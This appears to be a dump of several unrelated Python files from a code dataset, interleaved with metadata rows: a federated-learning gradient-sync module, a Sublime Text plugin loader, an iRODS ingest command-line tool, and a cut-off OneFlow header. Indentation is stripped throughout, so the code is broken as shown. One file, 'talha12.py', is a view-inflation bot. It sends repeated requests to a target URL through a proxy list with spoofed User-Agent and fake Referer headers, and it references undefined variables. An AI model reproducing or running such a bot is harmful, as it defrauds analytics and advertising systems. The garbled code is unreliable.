host_forward = self.host_forward_transfer.get(idx=-1, suffix=suffix)
return host_forward
def remote_fore_gradient(self, fore_gradient, suffix=tuple()):
self.fore_gradient_transfer.remote(obj=fore_gradient, role=consts.HOST, idx=-1, suffix=suffix)
def update_gradient(self, unilateral_gradient, suffix=tuple()):
self.unilateral_gradient_transfer.remote(unilateral_gradient, role=consts.ARBITER, idx=0, suffix=suffix)
optimized_gradient = self.unilateral_optim_gradient_transfer.get(idx=0, suffix=suffix)
return optimized_gradient
class Host(object):
def __init__(self):
self.forwards = None
self.fore_gradient = None
def _register_gradient_sync(self, host_forward_transfer, fore_gradient_transfer,
host_gradient_transfer, host_optim_gradient_transfer):
self.host_forward_transfer = host_forward_transfer
self.fore_gradient_transfer = fore_gradient_transfer
self.unilateral_gradient_transfer = host_gradient_transfer
self.unilateral_optim_gradient_transfer = host_optim_gradient_transfer
def compute_forwards(self, data_instances, model_weights):
raise NotImplementedError("Function should not be called here")
def compute_unilateral_gradient(self, data_instances, fore_gradient, model_weights, optimizer):
raise NotImplementedError("Function should not be called here")
def compute_gradient_procedure(self, data_instances, model_weights,
encrypted_calculator, optimizer,
n_iter_, batch_index):
"""
Linear model gradient procedure
Step 1: get host forwards which differ from different algorithm
For Logistic Regression: forwards = wx
"""
current_suffix = (n_iter_, batch_index)
self.forwards = self.compute_forwards(data_instances, model_weights)
encrypted_forward = encrypted_calculator[batch_index].encrypt(self.forwards)
self.remote_host_forward(encrypted_forward, suffix=current_suffix)
fore_gradient = self.get_fore_gradient(suffix=current_suffix)
unilateral_gradient = compute_gradient(data_instances,
fore_gradient,
model_weights.fit_intercept)
if optimizer is not None:
unilateral_gradient = optimizer.add_regular_to_grad(unilateral_gradient, model_weights)
optimized_gradient = self.update_gradient(unilateral_gradient, suffix=current_suffix)
return optimized_gradient, fore_gradient
def remote_host_forward(self, host_forward, suffix=tuple()):
self.host_forward_transfer.remote(obj=host_forward, role=consts.GUEST, idx=0, suffix=suffix)
def get_fore_gradient(self, suffix=tuple()):
host_forward = self.fore_gradient_transfer.get(idx=0, suffix=suffix)
return host_forward
def update_gradient(self, unilateral_gradient, suffix=tuple()):
self.unilateral_gradient_transfer.remote(unilateral_gradient, role=consts.ARBITER, idx=0, suffix=suffix)
optimized_gradient = self.unilateral_optim_gradient_transfer.get(idx=0, suffix=suffix)
return optimized_gradient
class Arbiter(object):
def __init__(self):
self.has_multiple_hosts = False
def _register_gradient_sync(self, guest_gradient_transfer, host_gradient_transfer,
guest_optim_gradient_transfer, host_optim_gradient_transfer):
self.guest_gradient_transfer = guest_gradient_transfer
self.host_gradient_transfer = host_gradient_transfer
self.guest_optim_gradient_transfer = guest_optim_gradient_transfer
self.host_optim_gradient_transfer = host_optim_gradient_transfer
def compute_gradient_procedure(self, cipher_operator, optimizer, n_iter_, batch_index):
"""
Compute gradients.
Received local_gradients from guest and hosts. Merge and optimize, then separate and remote back.
Parameters
----------
cipher_operator: Use for encryption
optimizer: optimizer that get delta gradient of this iter
n_iter_: int, current iter nums
batch_index: int, use to obtain current encrypted_calculator
"""
current_suffix = (n_iter_, batch_index)
host_gradients, guest_gradient = self.get_local_gradient(current_suffix)
if len(host_gradients) > 1:
self.has_multiple_hosts = True
host_gradients = [np.array(h) for h in host_gradients]
guest_gradient = np.array(guest_gradient)
size_list = [h_g.shape[0] for h_g in host_gradients]
size_list.append(guest_gradient.shape[0])
gradient = np.hstack((h for h in host_gradients))
gradient = np.hstack((gradient, guest_gradient))
grad = np.array(cipher_operator.decrypt_list(gradient))
LOGGER.debug("In arbiter compute_gradient_procedure, before apply grad: {}, size_list: {}".format(
grad, size_list
))
delta_grad = optimizer.apply_gradients(grad)
LOGGER.debug("In arbiter compute_gradient_procedure, delta_grad: {}".format(
delta_grad
))
separate_optim_gradient = self.separate(delta_grad, size_list)
LOGGER.debug("In arbiter compute_gradient_procedure, separated gradient: {}".format(
separate_optim_gradient
))
host_optim_gradients = separate_optim_gradient[: -1]
guest_optim_gradient = separate_optim_gradient[-1]
self.remote_local_gradient(host_optim_gradients, guest_optim_gradient, current_suffix)
return delta_grad
@staticmethod
def separate(value, size_list):
"""
Separate value in order to several set according size_list
Parameters
----------
value: list or ndarray, input data
size_list: list, each set size
Returns
----------
list
set after separate
"""
separate_res = []
cur = 0
for size in size_list:
separate_res.append(value[cur:cur + size])
cur += size
return separate_res
def get_local_gradient(self, suffix=tuple()):
host_gradients = self.host_gradient_transfer.get(idx=-1, suffix=suffix)
LOGGER.info("Get host_gradient from Host")
guest_gradient = self.guest_gradient_transfer.get(idx=0, suffix=suffix)
LOGGER.info("Get guest_gradient from Guest")
return host_gradients, guest_gradient
def remote_local_gradient(self, host_optim_gradients, guest_optim_gradient, suffix=tuple()):
for idx, host_optim_gradient in enumerate(host_optim_gradients):
self.host_optim_gradient_transfer.remote(host_optim_gradient,
role=consts.HOST,
idx=idx,
suffix=suffix)
self.guest_optim_gradient_transfer.remote(guest_optim_gradient,
role=consts.GUEST,
idx=0,
suffix=suffix)
| 39.805732
| 112
| 0.669334
|
70377993b318752d16fe8a9ea915272beedae22d
| 4,222
|
py
|
Python
|
talha12.py
|
talha123444e441/talha12
|
0d1ae324d297d1382966adaec874aa09f083bb34
|
[
"Apache-2.0"
] | null | null | null |
talha12.py
|
talha123444e441/talha12
|
0d1ae324d297d1382966adaec874aa09f083bb34
|
[
"Apache-2.0"
] | null | null | null |
talha12.py
|
talha123444e441/talha12
|
0d1ae324d297d1382966adaec874aa09f083bb34
|
[
"Apache-2.0"
] | null | null | null |
#!/system/bin/python
#TOOL OWNER Cayber solution bd
#Coded By Talha
#Date & Time 24/12/2021 [06:09]
#TDF
import urllib2
import urllib
import sys
import time
import random
import re
import os
os.system("clear")
#Warna
B = '\033[1m' #Bold
R = '\033[31m' #Red
G = '\033[32m' #Green
Y = '\033[33m' #Yellow
BL = '\033[34m' #Blue
P = '\033[35m' #Purple
W = '\033[37m' #White
U = '\033[2m' #Underline
N = '\033[0m' #Normal
#Pastikan Proxy List 1 Dir Dengan Script Python Ini
proxy_list = "proxylist.txt"
bacod = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
#Hargai Pembuat!.. Coding Ga Gampang!..
gblk = ['http://google.com','http://bing.com','http://facebook.com','http://twitter.com','http://yahoo.com']
print B+G+""
print " _____ __ ___ "
print " CYBER SOLUTION BD "
print " CYBER SOLUTION BD "
print " CYBER SOLUTION BD"
print "_"
print "-"
print C+T+A+L+H+A+""
print " _______________ _______________ ____ "
print " Abu Talha "
print " Abu Talha "
print " Abu Talha "
print " Abu Talha "
print " Abu Talha "
time.sleep(2)
print ''
print B+BL+'#-----------------------------------------#'
print B+R+' TAKE LOVE FROM CSB FAMILY'
print B+BL+'#-----------------------------------------#'
print B+W+' 1.YOU CAN GET UNLIMITED VIEW FROM THIS TOOL'
print B+W+'2.THIS TOOL OWNER :CYBER SOLUTION BD'
print B+W+'3.CODED BY MD Abu Talha '
print B+W+'4.WE ARE SYSTEM MAKERS'
print B+W+'5.CYBER SOLUTION BD '
print B+BL+'#-----------------------------------------#'
print B+R+' \!/WARNING\!/'
print B+BL+'#-----------------------------------------#'
ini_url = raw_input (B+Y+"[+] WEBPAGE URL : ")
print ''
print B+Y+'[+] STARTING => '+B+BL+'|'+B+W,ini_url
print B+BL+'#-----------------------------------------#'
def Autoclicker(proxy1):
try:
proxy = proxy1.split(":")
print B+BL+"#-----------------------------------------#\n"+B+W+'[-]',proxy1, ""+B+P+"=> Process"+N
time.sleep(2)
proxy_set = urllib2.ProxyHandler({"http" : "%s:%d" % (proxy[0], int(proxy[1]))})
opener = urllib2.build_opener(proxy_set, urllib2.HTTPHandler)
opener.addheaders = [('User-agent', random.choice(bacod)),
('Refferer', random.choice(gblk))]
urllib2.install_opener(opener)
f = urllib2.urlopen(ini_url)
#187034
if "google.com" in f.read():
print B+G+"[*] 200 OK"+"\n"+B+BL+"#-----------------------------------------#\n"+N
else:
print B+R+"[*] Link Gagal Di Kunjungi !\n"+B+BL+"#-----------------------------------------#\n"+N
print B+R+"[!] Proxy / Connection Failed\n"+B+BL+"#-----------------------------------------#\n"+N
except:
print B+R+"[!] Proxy Error\n"+B+BL+"#-----------------------------------------#\n"+N
time.sleep(5)
pass
def loadproxy():
try:
get_file = open(proxy_list, "r")
proxylist = get_file.readlines()
count = 0
proxy = []
while count < len(proxylist):
proxy.append(proxylist[count].strip())
count += 1
for i in proxy:
Autoclicker(i)
except IOError:
print B+W+"\n[-] Error : Proxy List Tidak Ditemukan / Belum Dibuat\n"+N
sys.exit(1)
def main():
print """
"""+N
loadproxy()
if __name__ == '__main__':
main()
| 36.08547
| 116
| 0.553529
|
541a5fbf78ae5d8016a0a7af7c01bc13f761637e
| 19,351
|
py
|
Python
|
sublime_plugin.py
|
koery/win-sublime
|
1b16cbe9858eced52567971286109250df787d36
|
[
"MIT"
] | null | null | null |
sublime_plugin.py
|
koery/win-sublime
|
1b16cbe9858eced52567971286109250df787d36
|
[
"MIT"
] | null | null | null |
sublime_plugin.py
|
koery/win-sublime
|
1b16cbe9858eced52567971286109250df787d36
|
[
"MIT"
] | null | null | null |
import sublime
import threading
import imp
import importlib
import os
import sys
import zipfile
import sublime_api
import traceback
api_ready = False
application_command_classes = []
window_command_classes = []
text_command_classes = []
all_command_classes = [application_command_classes, window_command_classes, text_command_classes]
all_callbacks = {'on_new': [], 'on_clone': [], 'on_load': [], 'on_pre_close': [], 'on_close': [],
'on_pre_save': [], 'on_post_save': [], 'on_modified': [],
'on_selection_modified': [],'on_activated': [], 'on_deactivated': [],
'on_query_context': [], 'on_query_completions': [],
'on_text_command': [], 'on_window_command': [],
'on_post_text_command': [], 'on_post_window_command': [],
'on_modified_async': [],
'on_selection_modified_async': [],
'on_pre_save_async': [],
'on_post_save_async': [],
'on_activated_async': [],
'on_deactivated_async': [],
'on_new_async': [],
'on_load_async': [],
'on_clone_async': []}
def unload_module(module):
if "plugin_unloaded" in module.__dict__:
module.plugin_unloaded()
# Check unload_handler too, for backwards compat
if "unload_handler" in module.__dict__:
module.unload_handler()
# Unload the old plugins
if "plugins" in module.__dict__:
for p in module.plugins:
for cmd_cls_list in all_command_classes:
try:
cmd_cls_list.remove(p)
except ValueError:
pass
for c in all_callbacks.values():
try:
c.remove(p)
except ValueError:
pass
def unload_plugin(modulename):
print("unloading plugin", modulename)
was_loaded = modulename in sys.modules
if was_loaded:
m = sys.modules[modulename]
unload_module(m)
del sys.modules[modulename]
def reload_plugin(modulename):
print("reloading plugin", modulename)
if modulename in sys.modules:
m = sys.modules[modulename]
unload_module(m)
m = imp.reload(m)
else:
m = importlib.import_module(modulename)
module_plugins = []
on_activated_targets = []
for type_name in dir(m):
try:
t = m.__dict__[type_name]
if t.__bases__:
is_plugin = False
if issubclass(t, ApplicationCommand):
application_command_classes.append(t)
is_plugin = True
if issubclass(t, WindowCommand):
window_command_classes.append(t)
is_plugin = True
if issubclass(t, TextCommand):
text_command_classes.append(t)
is_plugin = True
if is_plugin:
module_plugins.append(t)
if issubclass(t, EventListener):
obj = t()
for p in all_callbacks.items():
if p[0] in dir(obj):
p[1].append(obj)
if "on_activated" in dir(obj):
on_activated_targets.append(obj)
module_plugins.append(obj)
except AttributeError:
pass
if len(module_plugins) > 0:
m.plugins = module_plugins
if api_ready:
if "plugin_loaded" in m.__dict__:
try:
m.plugin_loaded()
except:
traceback.print_exc()
# Synthesize any required on_activated calls
for el in on_activated_targets:
w = sublime.active_window()
if w:
v = w.active_view()
if v:
try:
el.on_activated(v)
except:
traceback.print_exc()
def create_application_commands():
cmds = []
for class_ in application_command_classes:
cmds.append(class_())
sublime_api.notify_application_commands(cmds)
def create_window_commands(window_id):
window = sublime.Window(window_id)
cmds = []
for class_ in window_command_classes:
cmds.append(class_(window))
return cmds
def create_text_commands(view_id):
view = sublime.View(view_id)
cmds = []
for class_ in text_command_classes:
cmds.append(class_(view))
return cmds
def on_api_ready():
global api_ready
api_ready = True
for m in list(sys.modules.values()):
if "plugin_loaded" in m.__dict__:
try:
m.plugin_loaded()
except:
traceback.print_exc()
# Synthesize an on_activated call
w = sublime.active_window()
if w:
view_id = sublime_api.window_active_view(w.window_id)
if view_id != 0:
try:
on_activated(view_id)
except:
traceback.print_exc()
def on_new(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_new']:
try:
callback.on_new(v)
except:
traceback.print_exc()
def on_new_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_new_async']:
try:
callback.on_new_async(v)
except:
traceback.print_exc()
def on_clone(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_clone']:
try:
callback.on_clone(v)
except:
traceback.print_exc()
def on_clone_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_clone_async']:
try:
callback.on_clone_async(v)
except:
traceback.print_exc()
def on_load(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_load']:
try:
callback.on_load(v)
except:
traceback.print_exc()
def on_load_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_load_async']:
try:
callback.on_load_async(v)
except:
traceback.print_exc()
def on_pre_close(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_pre_close']:
try:
callback.on_pre_close(v)
except:
traceback.print_exc()
def on_close(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_close']:
try:
callback.on_close(v)
except:
traceback.print_exc()
def on_pre_save(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_pre_save']:
try:
callback.on_pre_save(v)
except:
traceback.print_exc()
def on_pre_save_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_pre_save_async']:
try:
callback.on_pre_save_async(v)
except:
traceback.print_exc()
def on_post_save(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_post_save']:
try:
callback.on_post_save(v)
except:
traceback.print_exc()
def on_post_save_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_post_save_async']:
try:
callback.on_post_save_async(v)
except:
traceback.print_exc()
def on_modified(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_modified']:
try:
callback.on_modified(v)
except:
traceback.print_exc()
def on_modified_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_modified_async']:
try:
callback.on_modified_async(v)
except:
traceback.print_exc()
def on_selection_modified(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_selection_modified']:
try:
callback.on_selection_modified(v)
except:
traceback.print_exc()
def on_selection_modified_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_selection_modified_async']:
try:
callback.on_selection_modified_async(v)
except:
traceback.print_exc()
def on_activated(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_activated']:
try:
callback.on_activated(v)
except:
traceback.print_exc()
def on_activated_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_activated_async']:
try:
callback.on_activated_async(v)
except:
traceback.print_exc()
def on_deactivated(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_deactivated']:
try:
callback.on_deactivated(v)
except:
traceback.print_exc()
def on_deactivated_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_deactivated_async']:
try:
callback.on_deactivated_async(v)
except:
traceback.print_exc()
def on_query_context(view_id, key, operator, operand, match_all):
v = sublime.View(view_id)
for callback in all_callbacks['on_query_context']:
try:
val = callback.on_query_context(v, key, operator, operand, match_all)
if val:
return True
except:
traceback.print_exc()
return False
def normalise_completion(c):
if len(c) == 1:
return (c[0], "", "")
elif len(c) == 2:
return (c[0], "", c[1])
else:
return c
def on_query_completions(view_id, prefix, locations):
v = sublime.View(view_id)
completions = []
flags = 0
for callback in all_callbacks['on_query_completions']:
try:
res = callback.on_query_completions(v, prefix, locations)
if isinstance(res, tuple):
completions += [normalise_completion(c) for c in res[0]]
flags |= res[1]
elif isinstance(res, list):
completions += [normalise_completion(c) for c in res]
except:
traceback.print_exc()
return (completions,flags)
def on_text_command(view_id, name, args):
v = sublime.View(view_id)
for callback in all_callbacks['on_text_command']:
try:
res = callback.on_text_command(v, name, args)
if isinstance(res, tuple):
return res
elif res:
return (res, None)
except:
traceback.print_exc()
return ("", None)
def on_window_command(window_id, name, args):
window = sublime.Window(window_id)
for callback in all_callbacks['on_window_command']:
try:
res = callback.on_window_command(window, name, args)
if isinstance(res, tuple):
return res
elif res:
return (res, None)
except:
traceback.print_exc()
return ("", None)
def on_post_text_command(view_id, name, args):
v = sublime.View(view_id)
for callback in all_callbacks['on_post_text_command']:
try:
callback.on_post_text_command(v, name, args)
except:
traceback.print_exc()
def on_post_window_command(window_id, name, args):
window = sublime.Window(window_id)
for callback in all_callbacks['on_post_window_command']:
try:
callback.on_post_window_command(window, name, args)
except:
traceback.print_exc()
class Command(object):
def name(self):
clsname = self.__class__.__name__
name = clsname[0].lower()
last_upper = False
for c in clsname[1:]:
if c.isupper() and not last_upper:
name += '_'
name += c.lower()
else:
name += c
last_upper = c.isupper()
if name.endswith("_command"):
name = name[0:-8]
return name
def is_enabled_(self, args):
ret = None
try:
args = self.filter_args(args)
if args:
ret = self.is_enabled(**args)
else:
ret = self.is_enabled()
except TypeError:
ret = self.is_enabled()
if not isinstance(ret, bool):
raise ValueError("is_enabled must return a bool", self)
return ret
def is_enabled(self):
return True
def is_visible_(self, args):
ret = None
try:
args = self.filter_args(args)
if args:
ret = self.is_visible(**args)
else:
ret = self.is_visible()
except TypeError:
ret = self.is_visible()
if not isinstance(ret, bool):
raise ValueError("is_visible must return a bool", self)
return ret
def is_visible(self):
return True
def is_checked_(self, args):
ret = None
try:
args = self.filter_args(args)
if args:
ret = self.is_checked(**args)
else:
ret = self.is_checked()
except TypeError:
ret = self.is_checked()
if not isinstance(ret, bool):
raise ValueError("is_checked must return a bool", self)
return ret
def is_checked(self):
return False
def description_(self, args):
try:
args = self.filter_args(args)
if args != None:
return self.description(**args)
else:
return self.description()
except TypeError as e:
return ""
def description(self):
return ""
def filter_args(self, args):
if args:
if 'event' in args and not self.want_event():
args = args.copy()
del args['event']
return args
def want_event(self):
return False
class ApplicationCommand(Command):
def run_(self, edit_token, args):
args = self.filter_args(args)
if args:
return self.run(**args)
else:
return self.run()
def run(self):
pass
class WindowCommand(Command):
def __init__(self, window):
self.window = window
def run_(self, edit_token, args):
args = self.filter_args(args)
if args:
return self.run(**args)
else:
return self.run()
def run(self):
pass
class TextCommand(Command):
def __init__(self, view):
self.view = view
def run_(self, edit_token, args):
args = self.filter_args(args)
if args:
edit = self.view.begin_edit(edit_token, self.name(), args)
try:
return self.run(edit, **args)
finally:
self.view.end_edit(edit)
else:
edit = self.view.begin_edit(edit_token, self.name())
try:
return self.run(edit)
finally:
self.view.end_edit(edit)
def run(self, edit):
pass
class EventListener(object):
pass
class MultizipImporter(object):
def __init__(self):
self.loaders = []
self.file_loaders = []
def find_module(self, fullname, path = None):
if not path:
for l in self.loaders:
if l.name == fullname:
return l
for l in self.loaders:
if path == [l.zippath]:
if l.has(fullname):
return l
return None
class ZipLoader(object):
def __init__(self, zippath):
self.zippath = zippath
self.name = os.path.splitext(os.path.basename(zippath))[0]
self.contents = {"":""}
self.packages = {""}
z = zipfile.ZipFile(zippath, 'r')
files = [i.filename for i in z.infolist()]
for f in files:
base, ext = os.path.splitext(f)
if ext != ".py":
continue
paths = base.split('/')
if len(paths) > 0 and paths[len(paths) - 1] == "__init__":
paths.pop()
self.packages.add('.'.join(paths))
try:
self.contents['.'.join(paths)] = z.read(f).decode('utf-8')
except UnicodeDecodeError:
print(f, "in", zippath, "is not utf-8 encoded, unable to load plugin")
continue
while len(paths) > 1:
paths.pop()
parent = '.'.join(paths)
if parent not in self.contents:
self.contents[parent] = ""
self.packages.add(parent)
z.close()
def has(self, fullname):
key = '.'.join(fullname.split('.')[1:])
if key in self.contents:
return True
override_file = os.path.join(override_path, os.sep.join(fullname.split('.')) + '.py')
if os.path.isfile(override_file):
return True
override_package = os.path.join(override_path, os.sep.join(fullname.split('.')))
if os.path.isdir(override_package):
return True
return False
def load_module(self, fullname):
if fullname in sys.modules:
mod = sys.modules[fullname]
else:
mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
mod.__file__ = self.zippath + "/" + fullname
mod.__name__ = fullname
mod.__path__ = [self.zippath]
mod.__loader__ = self
key = '.'.join(fullname.split('.')[1:])
if key in self.contents:
source = self.contents[key]
source_path = key + " in " + self.zippath
is_pkg = key in self.packages
try:
override_file = os.path.join(override_path, os.sep.join(fullname.split('.')) + '.py')
override_package_init = os.path.join(os.path.join(override_path, os.sep.join(fullname.split('.'))), '__init__.py')
if os.path.isfile(override_file):
with open(override_file, 'r') as f:
source = f.read()
source_path = override_file
elif os.path.isfile(override_package_init):
with open(override_package_init, 'r') as f:
source = f.read()
source_path = override_package_init
is_pkg = True
except:
pass
if is_pkg:
mod.__package__ = mod.__name__
else:
mod.__package__ = fullname.rpartition('.')[0]
exec(compile(source, source_path, 'exec'), mod.__dict__)
return mod
override_path = None
multi_importer = MultizipImporter()
sys.meta_path.insert(0, multi_importer)
def update_compressed_packages(pkgs):
multi_importer.loaders = []
for p in pkgs:
try:
multi_importer.loaders.append(ZipLoader(p))
except (FileNotFoundError, zipfile.BadZipFile) as e:
print("error loading " + p + ": " + str(e))
def set_override_path(path):
global override_path
override_path = path
| 27.763271
| 126
| 0.564467
|
57fabcd66a3d0abffdc0048e294218199e90ac29
| 8,874
|
py
|
Python
|
irods_capability_automated_ingest/irods_sync.py
|
trel/irods_capability_automated_ingest
|
38175f5f9788645777a42abca85379f77438941a
|
[
"BSD-3-Clause"
] | null | null | null |
irods_capability_automated_ingest/irods_sync.py
|
trel/irods_capability_automated_ingest
|
38175f5f9788645777a42abca85379f77438941a
|
[
"BSD-3-Clause"
] | null | null | null |
irods_capability_automated_ingest/irods_sync.py
|
trel/irods_capability_automated_ingest
|
38175f5f9788645777a42abca85379f77438941a
|
[
"BSD-3-Clause"
] | null | null | null |
from .sync_task import start_synchronization, stop_synchronization, list_synchronization, monitor_synchronization
import argparse
from uuid import uuid1
import json
import sys
def get_config(args):
return {
"log": {
"filename": getattr(args, "log_filename", None),
"when": getattr(args, "log_when", None),
"interval": getattr(args, "log_interval", None),
"level": getattr(args, "log_level", None)
},
"profile": {
"filename": getattr(args, "profile_filename", None),
"when": getattr(args, "profile_when", None),
"interval": getattr(args, "profile_interval", None),
"level": getattr(args, "profile_level", None)
},
"redis": {
"host": args.redis_host,
"port": args.redis_port,
"db": args.redis_db
}
}
def add_arguments(parser):
parser.add_argument('--log_filename', action="store", type=str, default=None, help="Specify name of log file.")
parser.add_argument('--log_when', action="store", type=str, default=None, help="Specify the type of log_interval (see TimedRotatingFileHandler).")
parser.add_argument('--log_interval', action="store", type=int, default=None, help="Specify the interval with which to rollover the ingest log file.")
parser.add_argument('--log_level', action="store", type=str, default=None, help="Specify minimum level of message to log (DEBUG, INFO, WARNING, ERROR).")
parser.add_argument('--profile_filename', action="store", type=str, default=None, help="Specify name of profile filename.")
parser.add_argument('--profile_when', action="store", type=str, default=None, help="Specify the type of profile_interval (see TimedRotatingFileHandler).")
parser.add_argument('--profile_interval', action="store", type=int, default=None, help="Specify the interval with which to rollover the ingest profile log file.")
parser.add_argument('--profile_level', action="store", type=str, default=None, help="Specify minimum level of message to log for profiling (DEBUG, INFO, WARNING, ERROR).")
parser.add_argument('--redis_host', action="store", type=str, default="localhost", help="Domain or IP address of Redis host.")
parser.add_argument('--redis_port', action="store", type=int, default=6379, help="Port number for Redis.")
parser.add_argument('--redis_db', action="store", type=int, default=0, help="Redis DB number to use for ingest.")
def handle_start(args):
ex_file_arg = args.exclude_file_type
if ex_file_arg != None:
ex_arg_list = [x.strip() for x in ex_file_arg[0].split(',')]
data = {}
data["restart_queue"] = args.restart_queue
data["path_queue"] = args.path_queue
data["file_queue"] = args.file_queue
data["target"] = args.target
data["root"] = args.root
data["interval"] = args.interval
data["job_name"] = args.job_name if args.job_name else str(uuid1())
data["append_json"] = args.append_json
data["ignore_cache"] = args.ignore_cache
data["initial_ingest"] = args.initial_ingest
data["event_handler"] = args.event_handler
data["config"] = get_config(args)
data["synchronous"] = args.synchronous
data["progress"] = args.progress
data["profile"] = args.profile
data["files_per_task"] = args.files_per_task
data["s3_endpoint_domain"] = args.s3_endpoint_domain
data["s3_region_name"] = args.s3_region_name
data["s3_keypair"] = args.s3_keypair
data["s3_proxy_url"] = args.s3_proxy_url
data["exclude_file_type"] = ex_arg_list
data['exclude_file_name'] = [ ''.join(r) for r in args.exclude_file_name ]
data['exclude_directory_name'] = [ ''.join(r) for r in args.exclude_directory_name ]
data['idle_disconnect_seconds'] = args.irods_idle_disconnect_seconds
return start_synchronization(data)
def handle_stop(args):
stop_synchronization(args.job_name, get_config(args))
return 0
def handle_watch(args):
return monitor_synchronization(args.job_name, True, get_config(args))
def handle_list(args):
jobs = list_synchronization(get_config(args))
print(json.dumps(jobs))
return 0
def main():
parser = argparse.ArgumentParser(description='continuous synchronization utility')
subparsers = parser.add_subparsers(help="subcommand help")
parser_start = subparsers.add_parser("start", formatter_class=argparse.ArgumentDefaultsHelpFormatter, help="start help")
parser_start.add_argument('root', metavar='SOURCE_DIRECTORY', type=str, help='Source directory or S3 folder to scan.')
parser_start.add_argument('target', metavar='TARGET_COLLECTION', type=str, help='Target iRODS collection for data objects (created if non-existent).')
parser_start.add_argument('-i', '--interval', action="store", type=int, default=None, help='Restart interval (in seconds). If absent, will only sync once.')
parser_start.add_argument('--file_queue', action="store", type=str, default="file", help='Name for the file queue.')
parser_start.add_argument('--path_queue', action="store", type=str, default="path", help='Name for the path queue.')
parser_start.add_argument('--restart_queue', action="store", type=str, default="restart", help='Name for the restart queue.')
parser_start.add_argument('--event_handler', action="store", type=str, default=None, help='Path to event handler file')
parser_start.add_argument('--job_name', action="store", type=str, default=None, help='Reference name for ingest job (defaults to generated uuid)')
parser_start.add_argument('--append_json', action="store", type=json.loads, default=None, help='Append json output')
parser_start.add_argument("--ignore_cache", action="store_true", default=False, help='Ignore last sync time in cache - like starting a new sync')
parser_start.add_argument("--initial_ingest", action="store_true", default=False, help='Use this flag on initial ingest to avoid check for data object paths already in iRODS.')
parser_start.add_argument('--synchronous', action="store_true", default=False, help='Block until sync job is completed.')
parser_start.add_argument('--progress', action="store_true", default=False, help='Show progress bar and task counts (must have --synchronous flag).')
parser_start.add_argument('--profile', action="store_true", default=False, help='Generate JSON file of system activity profile during ingest.')
parser_start.add_argument('--files_per_task', action="store", type=int, default='50', help='Number of paths to process in a given task on the queue.')
parser_start.add_argument('--s3_endpoint_domain', action="store", type=str, default='s3.amazonaws.com', help='S3 endpoint domain')
parser_start.add_argument('--s3_region_name', action="store", type=str, default='us-east-1', help='S3 region name')
parser_start.add_argument('--s3_keypair', action="store", type=str, default=None, help='Path to S3 keypair file')
parser_start.add_argument('--s3_proxy_url', action="store", type=str, default=None, help='URL to proxy for S3 access')
parser_start.add_argument('--exclude_file_type', nargs=1, action="store", default='none', help='types of files to exclude: regular, directory, character, block, socket, pipe, link')
parser_start.add_argument('--exclude_file_name', type=list, nargs='+', action="store", default='none', help='a list of space-separated python regular expressions defining the file names to exclude such as "(\S+)exclude" "(\S+)\.hidden"')
parser_start.add_argument('--exclude_directory_name', type=list, nargs='+', action="store", default='none', help='a list of space-separated python regular expressions defining the directory names to exclude such as "(\S+)exclude" "(\S+)\.hidden"')
parser_start.add_argument('--irods_idle_disconnect_seconds', action="store", type=int, default=60, help='irods disconnect time in seconds')
add_arguments(parser_start)
parser_start.set_defaults(func=handle_start)
parser_stop = subparsers.add_parser("stop", formatter_class=argparse.ArgumentDefaultsHelpFormatter, help="stop help")
parser_stop.add_argument('job_name', action="store", type=str, help='job name')
add_arguments(parser_stop)
parser_stop.set_defaults(func=handle_stop)
parser_watch = subparsers.add_parser("watch", formatter_class=argparse.ArgumentDefaultsHelpFormatter, help="watch help")
parser_watch.add_argument('job_name', action="store", type=str, help='job name')
add_arguments(parser_watch)
parser_watch.set_defaults(func=handle_watch)
parser_list = subparsers.add_parser("list", formatter_class=argparse.ArgumentDefaultsHelpFormatter, help="list help")
add_arguments(parser_list)
parser_list.set_defaults(func=handle_list)
args = parser.parse_args()
sys.exit(args.func(args))
if __name__ == "__main__":
main()
| 61.2
| 251
| 0.720645
|
fa5461f002f70e4fc45c7500d7c2d5b8d56d83d2
| 12,639
|
py
|
Python
|
python/oneflow/framework/env_util.py
|
mosout/oneflow
|
afbb221d900f1a340568ae2462b2022f8fcc4b3d
|
[
